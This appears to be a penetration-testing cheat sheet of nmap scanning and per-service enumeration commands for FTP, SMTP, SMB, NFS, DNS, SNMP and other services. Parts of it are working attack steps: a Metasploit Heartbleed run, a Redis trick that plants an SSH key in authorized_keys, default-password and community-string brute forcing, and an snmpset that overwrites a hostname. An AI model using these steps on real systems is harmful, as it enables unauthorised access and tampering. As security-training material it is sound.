Scanning

Password: hsaad.gitbook.io

TCP Behavior

• send=SYN, recieve=SYN-ACK

  • Port Open

• send=SYN, recieve=RST-ACK

  • Port Close

• send=SYN, recieve=ICMP-Port-Unreachable

  • Blocked by Firewall (Filtered)

• send=SYN, recieve=Nothing

  • Blocked by Firewall (Filtered)

UDP Behavior

• send=UDP, recieve=UDP-response

  • Port Open

• send=UDP, recieve=ICMP-Port-Unreachable

  • Port Close OR Blocked by Firewall

• send=UDP, recieve=Nothing

  • Port Close OR Blocked by Firewall OR Port Open but it is looking for specific data in UDP payload, nmap result: (Open|Filtered)

Port Scanning

# Host Discovery (Internal)
nmap -sn 192.168.43.164 --reason -v -n

# Host Discovery (External)
nmap -sn 8.8.8.8 --reason -v -n

1. ARP protocol if (local network).

2. ICMP protocol if (run as root).

3. TCP protocol on port 443 through SYN packet.

4. TCP protocol on port 80 through ACK packet.

773B

Host_Discovery.rar

Open

Host Discovery

# TCP Port Scanning
nmap 192.168.43.164 --reason -v -n

# UDP Port Scanning
nmap 8.8.8.8 -Pn -sU -p53,161 -v -n
 
# MIX Port Scanning
nmap 192.168.1.1 -sS -sU -p U:53,111,161,T:21-25,80,445

# Wireshark Filter
ip.addr==192.168.43.164 and tcp.flags.ack==1 and tcp.flags.syn==1
ip.addr==192.168.43.164 and tcp.port==80

165KB

Port_Scanning.rar

Open

Port Scanning

# Print Top 10 Ports
sort -r -k3 /usr/share/nmap/nmap-services | grep "/tcp" | head -n 10

# Scan Top 10 Ports
nmap 8.8.8.8 --reason -v -n --top-ports 10

1KB

Top_Ports_Scanning.rar

Open

Top 10 Ports Scanning

# Version Scanning
nmap 192.168.43.164 --reason -v -n -sV

Vulnerability Scanning

# Scripts Location
ls -l /usr/share/nmap/scripts/
cat script.db | grep -E "vuln|exploit"

nmap 192.168.43.164 --reason -v -n -sV --script vuln,exploit
nmap 192.168.43.164 --reason -v -n -sV --script default # Or -sC
nmap 192.168.43.164 --reason -v -n --script smb-vuln*

Enumeration

FTP (21)

nc 10.0.2.9 21
> USER anonymous
> PASS anonymous
ftp 10.0.2.9 21

> help
> ascii | binary
> pwd # print current directory on remote host
> ls  # list files on remote host
> lcd # print current directory on local host
> !ls # list files on local host
> get /home/test/file.txt /home/msfadmin/file.txt # download files
> put /home/msfadmin/file.txt /home/test/file2.txt # upload files

SMTP (25)

# Telnet
telnet 192.168.1.104 25
# method 1 (VRFY)
> VRFY msfadmin
# method 2 (RCPT)
> MAIL FROM:msfadmin
> RCPT TO:msfadmin
# method 3 (EXPN)

# Metasploit
use auxiliary/scanner/smtp/smtp_enum

# SMTP-User-Enum Users
smtp-user-enum -M VRFY -U unix_users.txt -t 192.168.1.104

# SMTP-User-Enum Emails
smtp-user-enum -M VRFY -D mega.local -U unix_users.txt -t 192.168.1.104

# Users Wordlist
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
/usr/share/seclists/Usernames/Names/names.txt

HTTP/HTTPS (80,443)

Note: Hostnames may be found in SSL Cert or DNS or Source Code.

# Directory Brute Force
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.56/cgi-bin/ -f -x php,txt,conf,sh,cgi

# SSL Cert Dump
echo | openssl s_client -connect 10.0.2.9:443 2>/dev/null | openssl x509 -noout -text | grep DNS:

# HeartBleed
nmap -sV --script=ssl-heartbleed 192.168.101.8

# Exploit
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.101.8
set verbose true
run

POP3 (110)

telnet 192.168.1.105 110
> USER pelle@192.168.1.105
> PASS admin

# List all emails
list

# Retrive email number 5, for example
retr 5

RPCbind (111)

rpcinfo -p 10.0.2.9

SMB (139,445)

# Who Run SMB
nbtscan -r 192.168.100.0/24

# NULL Session
rpcclient -U "" -N 10.0.2.4
> enumdomusers
> queryuser 0x3e8

# Session with username and password
rpcclient -U "test" 10.0.2.4

# Enum4Linux
enum4linux -{U|S|P|G} 10.0.2.4
enum4linux -{U|S|P|G} -u TestUser -p TestPass 192.168.100.200

# List Shares
smbmap -H 192.168.0.34
smbmap -u TestUser -p TestPass -H 192.168.0.34

smbclient -L 192.168.0.76
smbclient -U TestUser -L 192.168.0.70

# Access Shares
smbclient //192.168.0.70/tmp
smbclient -U TestUser //192.168.0.70/tmp

NFS (2049)

# Show mounted partitions
showmount -e 192.168.1.109

# Connect to specific partition
mount 192.168.1.109:/ /tmp/NFS

# Disconnnect
umount /tmp/NFS

MySQL (3306)

# try default passwords root OR toor OR empty
mysql -h 192.168.1.101 -u root -p

Disctcc (3632)

# Disctcc v1 expoit
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Redis (6379)

ssh-keygen -t rsa -f outkey
(echo -e "\n\n"; cat outkey.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 127.0.0.1 -x set crackit

redis-cli -h 127.0.0.1
ping
config get dir
config get *
config set dir /home/user/.ssh
config set dbfilename authorized_keys
save

ssh -i outkey redis@127.0.0.1

wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
python ssh2john.py outkey > outkey.txt
john --wordlist=/usr/share/wordlists/rockyou.txt outkey.txt

DNS (53)

# Lookup & Zone Transfer
host domain.name 8.8.8.8
host 1.1.1.1 8.8.8.8
host -t axfr domain.name dns-server

# Information Disclosure
dig @41.217.225.50 hostname.bind txt chaos
dig @41.217.225.50 version.bind txt chaos

NTP (123)

# NTP Mode 6 Query
ntpq -c rv IP
use scanner/ntp/ntp_unsettrap_dos

SNMP (161)

# Brute Force
nmap -sU --open -p 161 192.168.1.0/24
onesixtyone -c community.txt 192.168.1.244
onesixtyone -c community.txt -i ips.txt

# SNMP walk & set
snmpwalk -v1 -c public -t 10 192.168.1.244 > snmp.txt
snmpwalk -v1 -c public 192.168.1.244 iso.3.6.1.2.1.6.13.1.3 // Open ports
snmpset -v1 -c private 10.0.2.10 iso.3.6.1.2.1.1.5.0 s Hacked

# Metasploit
msfconsole
> use auxiliary/scanner/snmp/snmp_enum
> set rhosts 192.168.1.244
> run